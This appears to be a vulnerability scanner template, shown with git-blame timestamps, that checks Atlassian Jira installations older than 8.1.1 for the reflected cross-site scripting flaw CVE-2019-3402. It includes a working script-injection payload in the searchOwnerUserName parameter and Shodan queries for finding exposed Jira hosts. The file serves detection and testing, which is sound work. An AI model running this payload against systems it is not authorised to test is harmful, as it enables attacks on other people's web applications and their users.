2021-01-02 04:59:06 +00:00
id : CVE-2019-3402
2020-11-06 10:28:11 +00:00
info :
2022-10-26 06:24:30 +00:00
name : Jira < 8.1.1 - Cross-Site Scripting
2020-11-06 10:28:11 +00:00
author : pdteam
severity : medium
2022-10-26 06:24:30 +00:00
description : |
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
2022-05-17 09:18:12 +00:00
- https://jira.atlassian.com/browse/JRASERVER-69243
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/Faizee-Asad/JIRA-Vulnerabilities
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-3402
cwe-id : CWE-79
2024-03-23 09:28:19 +00:00
epss-score : 0.00238
2024-04-08 11:34:33 +00:00
epss-percentile : 0.61128
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
2022-07-04 13:18:38 +00:00
metadata :
2022-10-26 06:24:30 +00:00
verified : true
2023-09-06 12:53:28 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : atlassian
product : jira
2024-06-07 10:04:29 +00:00
shodan-query :
- http.component:"Atlassian Jira"
- http.component:"atlassian jira"
- http.component:"atlassian confluence"
- cpe:"cpe:2.3:a:atlassian:jira"
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,atlassian,jira,xss
2020-11-06 10:28:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-11-06 10:28:11 +00:00
- method : GET
path :
2021-06-09 18:31:38 +00:00
- "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
2020-11-06 10:28:11 +00:00
matchers-condition : and
matchers :
2022-10-26 06:24:30 +00:00
- type : word
part : body
words :
- "'<script>alert(1)</script>' does not exist"
- type : word
part : header
words :
- text/html
2020-11-06 10:28:11 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402201fdd87547b4b4f0da9b7c5d508247253c3619369479b116de338b309d92cde01022010a7c72fa7219ac5fb6603fa55ba82dfef346d1c3facac9ffd2cc273994a98cb:922c64590222798bb761d5b6d8e72950